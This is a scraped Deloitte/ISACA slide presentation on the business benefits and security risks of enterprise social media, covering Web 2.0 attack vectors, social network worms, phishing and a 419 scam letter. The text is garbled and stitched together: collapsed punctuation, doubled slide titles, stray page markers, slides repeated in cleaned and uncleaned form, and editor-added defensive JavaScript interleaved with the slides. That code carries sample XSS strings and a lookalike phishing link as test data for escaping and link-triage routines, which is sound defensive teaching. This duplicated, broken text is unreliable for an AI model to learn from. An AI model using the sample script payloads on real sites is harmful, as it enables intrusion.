ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
Enhance customer and partner relationships

• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g., engineers, scientists, product managers) to gather firsthand feedback from customers
• Allows customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledge base, while monitoring customer perception
• Provides a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allows consumers who know your products and services best to become a part of the new offering development process

Revenue growth: A major consumer goods company improved sales by 315% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value
Enhance customer and partner relationships (cont.)

• Procter & Gamble – Capessa, launched in the “Yahoo Health” section of Yahoo.com, one of the world’s leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com
Enhance customer and partner relationships (cont.)

• American Express – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com
Enhance customer and partner relationships (cont.)

• State of Louisville, Kentucky – Interactive audit findings on the Web site. Allows the users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit
Enhance customer and partner relationships (cont.)

• Amazon – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com
Enhance customer and partner relationships (cont.)

• Bank of America (BofA) – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest update.
Risks and challenges
Risks and challenges

• Farmers and Mobsters
  – Top Facebook Applications
    • Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                    Monthly Active Users
   1  FarmVille                         82,580,911
   2  Static FBML                       46,827,021
   3  Birthday Cards                    41,904,049
   4  Café World                        30,032,716
   5  Facebook for iPhone               29,438,848
   6  Texas HoldEm Poker                28,332,917
   7  Slide FunSpace                    25,630,033
   8  Happy Aquarium (BETA)             24,915,971
   9  Mafia Wars                        24,704,179
  10  Causes                            24,317,292
Risks and challenges (cont.)

• New security concerns and attack vectors — as a result of the shift in technology through Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML (“AJAX”) and Rich Internet Application (“RIA”) clients that are enhancing client-end interfaces in the browser itself
• Top 10 Web 2.0 Attack Vectors — http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting (“CSS”) in AJAX, e.g., “Samy worm that exploited MySpace.com’s CSS flaw”
  – XML poisoning — poison XML blocks coming from AJAX client
  – Malicious AJAX code execution — replay of cookies for each request
  – RSS/Atom injection — inject JavaScripts into the RSS feeds to generate attack on client browser
  – Web Services Definition Language (“WSDL”) scanning and enumeration
  – Client-side validation in AJAX routines — fail to perform server-side checks
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP message — bypass authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
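Two of the vectors in the list above from the defender's side, as an added JavaScript example (this is not code from the presentation or from the net-square paper; the feed item, the comment rules and every function name are constructed for illustration): untrusted feed text and links are escaped for the HTML context they land in before any markup is built, and the server repeats the validation the browser already performed rather than trusting it.

```javascript
// Added example, not code from the presentation or the net-square paper.
// Illustrates two of the listed vectors from the defender's side:
//   1. RSS/Atom injection and XSS in AJAX responses: feed text and links are
//      escaped for the HTML context they land in before markup is built.
//   2. Client-side validation in AJAX routines: the server repeats the check
//      instead of trusting what the browser claims to have validated.
// The feed item, the comment rules and all names are constructed for this example.

// Escape the characters that let text break out of an HTML text or
// attribute-value context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Allow only absolute http(s) links. javascript:, data: and anything else
// collapses to '#', so a feed entry cannot smuggle a script URL into an anchor.
function safeHref(link) {
  return /^https?:\/\//i.test(String(link).trim()) ? escapeHtml(link) : '#';
}

// "Before": feed fields are concatenated straight into the page. Kept only to
// show what the hardened version changes.
function renderFeedItemUnsafe(item) {
  return `<li><a href="${item.link}">${item.title}</a> ${item.summary}</li>`;
}

// "After": every dynamic value goes through the encoder for its context.
function renderFeedItemSafe(item) {
  return `<li><a href="${safeHref(item.link)}" rel="noopener noreferrer">`
    + `${escapeHtml(item.title)}</a> ${escapeHtml(item.summary)}</li>`;
}

// Server-side twin of the browser's comment-form validation. The browser may
// have been bypassed entirely, so the server never relies on it.
const COMMENT_RULES = {
  maxBodyLength: 500,
  authorPattern: /^[\w .'-]{1,64}$/,
};

function validateCommentServerSide(payload) {
  if (typeof payload !== 'object' || payload === null) {
    return { ok: false, errors: ['payload must be a JSON object'] };
  }
  const errors = [];
  if (typeof payload.author !== 'string' || !COMMENT_RULES.authorPattern.test(payload.author)) {
    errors.push('author missing or contains disallowed characters');
  }
  if (typeof payload.body !== 'string' || payload.body.length === 0) {
    errors.push('body is required');
  } else if (payload.body.length > COMMENT_RULES.maxBodyLength) {
    errors.push(`body exceeds ${COMMENT_RULES.maxBodyLength} characters`);
  }
  return { ok: errors.length === 0, errors };
}

// Constructed feed item carrying a script tag in the title and a javascript:
// link, the shape of the RSS/Atom injection vector in the list above.
const SAMPLE_ITEM = {
  title: 'Quarterly results <script>alert(1)</script>',
  link: 'javascript:alert(1)',
  summary: 'Read more at our <b>site</b>',
};

console.log('unsafe:', renderFeedItemUnsafe(SAMPLE_ITEM));
console.log('safe:  ', renderFeedItemSafe(SAMPLE_ITEM));
console.log(validateCommentServerSide({ author: 'Jane Doe', body: 'x'.repeat(600) }));
```

escapeHtml covers only an HTML text or attribute-value context; a value dropped into a script block or a URL query string needs the encoder for that context instead. The unsafe renderer is kept purely to make the difference visible.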
Risks and challenges (cont.)

• Example worms and phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data.
  – Fbaction – Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account.
Risks and challenges (cont.)

  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user’s Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends.
• Common element – they all take advantage of the implied trust that social networking users have with each other
Risks and challenges (cont.)

“Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening.” – Marcus Ranum in InfoSec Magazine, May 2008

• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools
• May also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com, etc.
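A link-triage routine as an added JavaScript example, covering the URL-shortening bullet above together with the brand-lookalike phishing pages (fbaction.net) described on the preceding slides. The three shortener hosts are the ones named on the slide; the brand-to-domain table, the sample messages and the function names are assumptions constructed for the example and are not part of the presentation.

```javascript
// Added example, not code from the presentation. Triage of links arriving
// through social networking messages: shortened URLs hide their destination,
// and phishing pages borrow a brand name inside a domain the brand does not
// own. The shortener hosts are the ones named on the slide; the brand table,
// the sample messages and all function names are assumptions constructed here.

const SHORTENER_HOSTS = new Set(['bit.ly', 'tr.im', 'tinyurl.com']);

// Brand keyword -> domains that brand really uses (assumed list, not authoritative).
const BRAND_DOMAINS = {
  facebook: ['facebook.com', 'fb.com'],
  linkedin: ['linkedin.com'],
  twitter: ['twitter.com'],
};

// Pull http(s) URLs out of free text; trailing sentence punctuation is trimmed.
function extractUrls(text) {
  const found = text.match(/https?:\/\/[^\s<>"']+/gi) || [];
  return found.map((u) => u.replace(/[.,;:!?)]+$/, ''));
}

// True when host is the domain itself or a subdomain of it.
function hostUnderDomain(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

// Reasons to treat one URL with suspicion; an empty array means nothing flagged.
function assessUrl(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch (e) {
    return ['unparseable URL'];
  }
  const host = url.hostname.toLowerCase();
  const reasons = [];
  if (SHORTENER_HOSTS.has(host)) {
    reasons.push('shortened URL: destination hidden until expanded');
  }
  for (const [brand, domains] of Object.entries(BRAND_DOMAINS)) {
    const mentionsBrand = host.includes(brand);
    const genuine = domains.some((d) => hostUnderDomain(host, d));
    if (mentionsBrand && !genuine) {
      reasons.push(`brand "${brand}" used in a domain the brand does not own (${host})`);
    }
  }
  return reasons;
}

// Scan a batch of messages; each hit records message index, URL and reasons.
function triageMessages(messages) {
  const hits = [];
  messages.forEach((text, index) => {
    for (const url of extractUrls(text)) {
      const reasons = assessUrl(url);
      if (reasons.length > 0) hits.push({ index, url, reasons });
    }
  });
  return hits;
}

// Constructed sample messages of the kind seen in a social networking inbox.
const SAMPLE_MESSAGES = [
  'Check out this video http://bit.ly/abc123 lol',
  'Your account needs verification: http://facebook.login-check.example/verify.',
  'Minutes from the meeting are at https://intranet.example.com/minutes/2010-03',
  'Connect with me http://www.linkedin.com/in/someone',
];

console.log(JSON.stringify(triageMessages(SAMPLE_MESSAGES), null, 2));
```

The lookalike check is a substring heuristic: it flags hosts that contain a brand name without being under that brand's own domains, so a name such as fbaction.net, which does not contain the word facebook, still needs a reputation lookup or a manual review. A shortener hit is the cue to expand the link in an isolated resolver and assess the real destination before anyone clicks it.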
Risks and challenges (cont.)

• More on phishing — social networks are a target-rich environment
Risks and challenges (cont.)

• More on phishing — social networks are a target-rich environment (cont.)

“Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father’s name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it my father died last year…………” – See http://www.419legal.org for more details

• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
Risks and challenges (cont.)

• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation — Third-party material such as essays, articles and photographs are used without written consent from the proprietor
• Intellectual Property theft — Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium
Risks and challenges (cont.)

• Failures in the use of Social Media — most companies that use Social Media don’t approach it the way they would with other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren’t fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail

“Fully half of all Social Media investments will fail” — Gartner
Risks and challenges (cont.)

“When I discovered YouTube, I didn't work for five days. I did nothing. I viewed ‘cookie monster sings chocolate rain’ about 1,000 times.” – Michael Scott from The Office

• Productivity — Users employ social media tools for nonproductive purposes such as socializing (“Social Notworking”)
  http://news.bbc.co.uk/2/hi/business/8325865.stm
Risks and challenges (cont.)

• Technical Integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with:
    • Facebook
    • AOL
    • Twitter
    • Blogger
    • Myspace
    • WordPress
    • Yahoo
    • Netlog
    • Google
    • OpenID
    • Windows Live ID
    • flickr
Risks and challenges (cont.)

• Information hoarding — In many industries, value is placed on what an employee knows that others do not know. This belief prevents data sharing.
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom’s law, which states that — “The value of a network equals the net value of each user’s transactions conducted through that network, valued from the perspective of each user, and summed for all”

Or, alternatively:

  – http://en.wikipedia.org/wiki/Beckstrom's_law
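The prose statement of Beckstrom’s law above, written out in its usual algebraic form as an added illustration (this is the standard published form of the law, added here by the editor; it is not a transcription of the slide):

$$
V_{i,j} \;=\; \sum_{k=1}^{n} \frac{B_{i,j,k} - C_{i,j,k}}{(1 + r_k)^{t_k}},
\qquad
V_j \;=\; \sum_{i} V_{i,j}
$$

Here $V_{i,j}$ is the present value of network $j$ to user $i$; $B_{i,j,k}$ and $C_{i,j,k}$ are the benefit and the cost to user $i$ of the $k$-th of $n$ transactions conducted over network $j$; $r_k$ is the discount rate and $t_k$ the elapsed time to that transaction; and the value of the whole network, $V_j$, is the sum over all of its users. The point for an auditor is that value accrues per user and per transaction, so a network with many connections but few useful transactions, or with costly ones (a breach or a data leak enters as a cost $C$), can have a low or even negative value, which a connection-count model cannot express.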
Risks and challenges (cont.)

• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation issues
A quick word on privacy

“People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time.”
— Mark Zuckerberg, Facebook founder

“If you have something that you don’t want anyone to know, maybe you shouldn’t be doing it in the first place.”
— Eric Schmidt, CEO, Google Inc.
A quick word on privacy (cont.)

• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence – limited attempt to address
Responding to the risks and challenges

• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Define consequences for failure to comply, e.g., “termination of employment and legal action”
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
Responding to the risks and challenges

• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
Responding to the risks and challenges (cont.)

• Vulnerability Assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on Ports 80 & 443
  – Next-generation firewall technology that offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real-time
    • Visibility and policy control over application access
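The next-generation firewall bullets above, as an added JavaScript example of the policy model they describe (this is not vendor code or code from the presentation): the application is identified from the TLS SNI or HTTP Host name carried in the flow record rather than from the port, and the rule is chosen by user group rather than by IP address. The application catalogue, the user directory, the rule table and the flow records are all constructed for the example.

```javascript
// Added example, not vendor code or code from the presentation. A minimal
// evaluator for the kind of policy the slide describes: the application is
// taken from the TLS SNI / HTTP Host name in the flow record rather than the
// port, and the rule is selected by user group rather than by IP address.
// Application catalogue, user directory, rules and flows are all constructed.

// Host suffix -> application name (assumed catalogue).
const APP_CATALOGUE = [
  { app: 'facebook', hosts: ['facebook.com', 'fbcdn.net'] },
  { app: 'twitter', hosts: ['twitter.com'] },
  { app: 'linkedin', hosts: ['linkedin.com'] },
];

// Username -> group (assumed directory lookup; unknown users get 'unassigned').
const USER_GROUPS = { alice: 'marketing', bob: 'engineering', carol: 'marketing' };

// Ordered rules, first match wins. '*' is a wildcard. The final rule is an
// explicit default so that unrecognised traffic is handled deliberately.
const POLICY = [
  { group: 'marketing', app: 'facebook', action: 'allow' },
  { group: 'marketing', app: 'twitter', action: 'allow' },
  { group: '*', app: 'linkedin', action: 'allow' },
  { group: '*', app: 'facebook', action: 'deny' },
  { group: '*', app: 'twitter', action: 'deny' },
  { group: '*', app: '*', action: 'allow' },
];

function identifyApp(host) {
  const h = String(host).toLowerCase();
  for (const entry of APP_CATALOGUE) {
    if (entry.hosts.some((d) => h === d || h.endsWith('.' + d))) return entry.app;
  }
  return 'unknown';
}

function lookupGroup(user) {
  return Object.prototype.hasOwnProperty.call(USER_GROUPS, user) ? USER_GROUPS[user] : 'unassigned';
}

// flow: { user, host, port }. The port is carried through for the log record
// but plays no part in the decision.
function decide(flow) {
  const app = identifyApp(flow.host);
  const group = lookupGroup(flow.user);
  for (const rule of POLICY) {
    const groupMatch = rule.group === '*' || rule.group === group;
    const appMatch = rule.app === '*' || rule.app === app;
    if (groupMatch && appMatch) return { ...flow, app, group, action: rule.action, rule };
  }
  return { ...flow, app, group, action: 'deny', rule: null }; // fail closed
}

function evaluate(flows) {
  return flows.map(decide);
}

// Constructed flow records (user and host as a next-generation firewall would
// resolve them; the port varies to show that it does not matter).
const SAMPLE_FLOWS = [
  { user: 'alice', host: 'www.facebook.com', port: 443 },
  { user: 'bob', host: 'www.facebook.com', port: 443 },
  { user: 'bob', host: 'www.facebook.com', port: 8443 },
  { user: 'bob', host: 'www.linkedin.com', port: 443 },
  { user: 'dave', host: 'twitter.com', port: 80 },
  { user: 'alice', host: 'intranet.example.com', port: 443 },
];

for (const r of evaluate(SAMPLE_FLOWS)) {
  console.log(`${r.user.padEnd(6)} ${r.group.padEnd(12)} ${r.host.padEnd(22)} :${r.port}  ${r.app.padEnd(9)} -> ${r.action}`);
}
```

Rules are evaluated top down and the last rule is an explicit default, so an unrecognised application is handled by a decision someone wrote rather than by accident; the flow on port 8443 is classified and denied exactly like the one on 443. Content scanning and SSL inspection, the other capabilities on the slide, sit on top of this classification and are outside the example.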
What is next in the world of social networking
Where we are at today

• Enterprise Social Media has crossed the tipping point and is no longer considered an “emerging” technology

“The Hype Cycle” – http://en.wikipedia.org/wiki/Hype_cycle
What’s next in the world of social networking

• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, an increase of more than 400% over the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social Networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car’s navigation system will be able to learn your friend’s location and provide directions to them
Some further predictions

• Some quotes on social networks
  – “Probably the greatest transformative force in our generation, absent a major war” — Mark Zuckerberg, Facebook founder
  – “(Twitter is)… Something important that has the potential to change the world, though we have a long way to go” — Biz Stone, Co-founder of Twitter
Q&A
Today’s Presenters

Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
Appendix

• Additional resources
  – Gopal, Raj et al., “Web 2.0 reinvents corporate networking”, Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – “Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out” by Fred Vogelstein, Wired Magazine (June 2009) – http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – “The Future is Social, Not Search, Facebook COO Says” by Ryan Singel, Wired Magazine (October 2009) – http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.

Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
Statistics on companies using Social Networking (cont.)

Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.

Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
Companies typically adopt Social Media for three major benefits

1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
Increase employee productivity and operational efficiencies

• Creates a lightweight institutional memory system for a company’s intellectual assets to be easily captured, stored and accessed
• Reduces the net volume of e-mail and allows users to “pull” information at their convenience, as opposed to spending time reading through mass e-mail chains
• Creates better quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world

Operational efficiencies: A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using Social Media

Improved reporting: A global investment bank tightened reporting cycle times from several weeks to “about 30 seconds” per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
Increase employee productivity and operational efficiencies (cont.)

• American Red Cross – Designed to incite discussions around issues the American Red Cross cares about and describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and give valuable information about preventing, preparing for and responding to emergencies. http://redcrosschat.org
Increase employee productivity and operational efficiencies (cont.)

• Deloitte’s DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte

As used in this document, “Deloitte” means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Foster creativity, innovation and collaboration

• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
